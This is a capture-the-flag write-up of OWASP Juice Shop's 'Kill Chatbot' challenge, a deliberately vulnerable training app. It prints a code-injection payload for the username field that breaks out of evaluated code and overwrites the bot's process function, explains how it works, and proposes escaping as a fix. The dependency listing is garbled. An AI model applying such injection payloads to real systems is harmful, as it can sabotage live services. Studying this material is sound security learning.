Hacking OWASP’s Juice Shop Pt. 64: Kill Chatbot


Name:  Kill Chatbot

Description: Permanently disable the support chatbot so that it can no longer answer customer queries.

Difficulty:  5 stars

Category: Vulnerable Components

Expanded Description: https://pwning.owasp-juice.shop/part2/vulnerable-components.html

Tools used:


Resources used:

Solution Guide: https://pwning.owasp-juice.shop/appendix/solutions.html


The expanded description for this challenge heavily suggests that the vulnerability to exploit has something to do with the code which runs the bot. First things first, I found the package which runs the bot, "juicy-chat-bot", in the application's configuration file.

[npm listing: juicy-chat-bot — "Smart, friendly and helpful chat bot for OWASP Juice Shop." Published 14 days ago · 9 dependencies]

Here I found that there's a GitHub repository for the package, so I went there and cloned the source.

Next, I checked out what the dependencies were, thinking there may be a library here which has a known vulnerability to exploit.

"dependencies" : 
vm2" "%.9.2", 
"anlpjs/core-loader": "A4.4.ø 
"anlpjs/evaluator": "A4.4.ø 
"anlpjs/lang-all : "A 
" 4.4.0", 
"anlpjs/language": "A4 3 0 
"Onlpjs/nlp • 
"Onlpjs/nlu • "A 
"anlpjs/request": "A4.4 0 
"onlpjs/sentiment": "A4.4 0 
"devDependencies " : 
nyc". "A15.ø.0", 
"chal : 
"mocha • 
"standard • "A 

Unfortunately there was no such luck. I then spent significant time poring over each file in the GitHub repository, trying to find a way to kill the bot. My lack of JavaScript experience, however, was a serious hindrance to this effort. Having written very, very little JS over the course of my education, I struggled to figure out what the intended solution for this challenge was. I saw the following piece of code and knew it had to have something to do with the solution, but had zero clue how to exploit it.

```javascript
users = {
  idmap: {},
  addUser: function (token, name) {
    this.idmap[token] = name
  },
  get: function (token) {
    return this.idmap[token]
  }
}

function train () {
  trainingSet.data.forEach((query) => {
    query.utterances.forEach((utterance) => {
      model.addDocument(trainingSet.lang, utterance, query.intent)
    })
    query.answers.forEach((answer) => {
      model.addAnswer(trainingSet.lang, query.intent, answer)
    })
  })
  model.train().then(() => { training.state = true })
}

function process (query, token) {
  if (users.get(token)) {
    return model.process(trainingSet.lang, query)
  } else {
    return {
      action: 'unrecognized',
      body: 'user does not exist'
    }
  }
}
```
So I went to the Solution Guide and found this string:  admin"); process=null; users.addUser("1337", "test

This string inserts JS code through the "username" field, and it took me a while to wrap my head around why it works. The bot splices whatever name you give it directly into code that it runs in its sandbox. The payload closes off the intended `users.addUser(...)` call early, adds a second statement, `process=null`, which wipes out the `process()` function the bot uses to answer queries, and then opens a new `users.addUser("1337", "test` call so that the code's original closing characters still leave everything syntactically valid.
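A minimal sketch of the breakout; the token value and the template string below are my assumptions about the pattern, not the exact Juice Shop source:

```javascript
// Hypothetical sketch of the vulnerable pattern: user input is spliced,
// unsanitized, into a string of code that the sandbox later evaluates.
const token = 'abc123'
const username = 'admin"); process=null; users.addUser("1337", "test'

// What the application intends to run:
const code = `users.addUser("${token}", "${username}")`

// After interpolation the sandbox sees three statements instead of one:
//   users.addUser("abc123", "admin");
//   process=null;
//   users.addUser("1337", "test")
// Overwriting `process` destroys the function the bot answers with,
// so every later query fails: the bot is dead.
console.log(code)
// -> users.addUser("abc123", "admin"); process=null; users.addUser("1337", "test")
```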

I'm sorry I didn't get your name. What shall I call you?
admin"); process=null; users.addUser("1337", "test
Nice to meet you admin, I'm Juicy
Oh no... Remember to stay hydrated when I'm gone...
You successfully solved a challenge: Kill Chatbot (Permanently disable the support chatbot so that it can no longer answer customer queries.)

Prevention and Mitigation Strategies:

OWASP Vulnerable Dependency Management Cheat Sheet

Lessons Learned and Things Worth Mentioning: 

JavaScript (and possibly other languages with dynamic evaluation, I haven't checked yet) will happily treat user input as code when that input is concatenated into a string that later gets evaluated, rather than being passed around as data or sanitized first. This is something entirely new to me, and as I've never seen it before I wouldn't have been able to work it out without the Solution Guide.
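As an illustration of one possible fix (the helper names are made up, and this is not Juice Shop's actual patch): encode user-controlled values before splicing them into code, so quotes in the input can never terminate the string literal and smuggle in extra statements.

```javascript
// Illustrative fix: JSON-encode user-controlled values before they are
// embedded in code. Helper names are made up for this sketch.
const unsafe = (token, name) => `users.addUser("${token}", "${name}")`
const safe = (token, name) =>
  `users.addUser(${JSON.stringify(token)}, ${JSON.stringify(name)})`

const payload = 'admin"); process=null; users.addUser("1337", "test'

console.log(unsafe('abc', payload)) // three statements -- injection succeeds
console.log(safe('abc', payload))   // one call; the payload stays a plain string
```

With `JSON.stringify`, the quotes inside the payload are escaped (`\"`), so the whole payload remains a single string argument no matter what the user types.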
